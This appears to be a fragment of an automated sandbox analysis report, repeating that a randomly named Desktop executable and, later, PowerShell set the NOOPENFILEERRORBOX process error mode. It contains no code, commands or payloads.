        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
